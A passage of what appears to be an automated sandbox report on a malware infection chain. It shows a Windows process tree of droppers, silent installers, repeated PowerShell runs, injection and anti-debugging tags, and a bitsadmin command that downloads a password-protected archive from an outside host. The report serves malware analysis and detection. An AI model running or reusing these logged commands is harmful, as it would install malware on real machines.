                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                    PID:6004
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                12⤵
                                                                                                                                                                                                  PID:4044
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                    PID:2808
                                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633412281 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                        PID:2956
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jfrkkret.ip0\any.exe & exit
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                      PID:2280
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfrkkret.ip0\any.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfrkkret.ip0\any.exe
                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                          PID:3840
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe & exit
                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                          PID:6680
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe
                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                            PID:5632
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:5000
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                PID:4080
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kffn52pb.l3q\cust2.exe & exit
                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                              PID:5984
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\kffn52pb.l3q\cust2.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\kffn52pb.l3q\cust2.exe
                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                  PID:6588
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p1s5i1oi.jbr\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                  PID:5140
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\p1s5i1oi.jbr\gcleaner.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\p1s5i1oi.jbr\gcleaner.exe /mixfive
                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                      PID:2208
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 236
                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                        PID:1044
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l1ytovuw.hyr\autosubplayer.exe /S & exit
                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                      PID:1708
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\l1ytovuw.hyr\autosubplayer.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\l1ytovuw.hyr\autosubplayer.exe /S
                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        PID:1116
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                            PID:5312
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                              PID:3400
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                              PID:5224
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                PID:6904
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                  PID:3884
                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                    PID:4788
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                    PID:3044
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                    • Checks for any installed AV software in registry
                                                                                                                                                                                                                                    PID:5972
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                    "bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                                                                                                    PID:5280
                                                                                                                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pehbuAUvOgr0pPji -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                    PID:3136
                                                                                                                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p7MGCcRF8TyEcJi9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                      PID:4392
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                        PID:3468
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                          PID:2528
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                            PID:5812
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                              PID:4080
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                PID:1060
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                  PID:3732
                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio
                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                    PID:2028
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                    PID:1956
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                    PID:5644
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                    PID:2220
                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                      PID:5596
                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                        PID:3308
                                                                                                                                                                                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                          PID:3556
                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pe5pbs3x.xuw\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                        PID:2456
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\pe5pbs3x.xuw\installer.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\pe5pbs3x.xuw\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                            PID:4004
                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\PoPwKAAL10hfY8NvUrJ5iwSb.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\PoPwKAAL10hfY8NvUrJ5iwSb.exe" silent
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:6868
                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\hGHRtD_CfhIrmrqgxyiaej7E.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\hGHRtD_CfhIrmrqgxyiaej7E.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:1244
                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:3228
                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\UNPgDYBJfd6kF2hyuwASzsYz.exe"
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                    PID:2092
                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\ROTvtAkvU5hsf3cGIbnsGJit.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\ROTvtAkvU5hsf3cGIbnsGJit.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:5772
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2483327.scr
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2483327.scr" /S
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:1844
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4944009.scr
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4944009.scr" /S
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                    PID:4240
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8460512.scr
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8460512.scr" /S
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                    PID:5036
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3313489.scr
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\3313489.scr" /S
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                    PID:3160
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2423863.scr
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2423863.scr" /S
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:5012
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                PID:1980
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16205451b994.exe
                                                                                                                                                                                                                                                  Thu16205451b994.exe /mixone
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:3332
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Thu161580bf75.exe
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                PID:1876
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu161580bf75.exe
                                                                                                                                                                                                                                                  Thu161580bf75.exe
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:3360
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5748237.scr
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5748237.scr" /S
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                    PID:2492
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8871820.scr
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8871820.scr" /S
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:2452
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:2236
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4387696.scr
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4387696.scr" /S
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                    PID:3740
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8907188.scr
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8907188.scr" /S
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                    PID:5564
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1625681.scr
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1625681.scr" /S
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                    PID:4484
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1625681.scr
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1625681.scr"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:5652
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\4540442.scr
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\4540442.scr" /S
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:1172
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                    PID:3176
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1628aafb3efd7c3d.exe
                                                                                                                                                                                                                                                      Thu1628aafb3efd7c3d.exe
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:3408
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3408 -s 308
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                        PID:4644
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:1816
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu165bd34b1e1d4d81.exe
                                                                                                                                                                                                                                                        Thu165bd34b1e1d4d81.exe
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                        PID:1068
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1992
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:4748
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:2264
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe
                                                                                                                                                                                                                                                          Thu16f3de88a335950bb.exe
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:1444
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-ILAHR.tmp\Thu16f3de88a335950bb.tmp
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-ILAHR.tmp\Thu16f3de88a335950bb.tmp" /SL5="$3017A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:2380
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe" /SILENT
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:3400
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-FGJHH.tmp\Thu16f3de88a335950bb.tmp
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-FGJHH.tmp\Thu16f3de88a335950bb.tmp" /SL5="$4017A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f3de88a335950bb.exe" /SILENT
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                PID:4852
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-5OTNA.tmp\postback.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-5OTNA.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:4240
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:3620
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:6328
                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
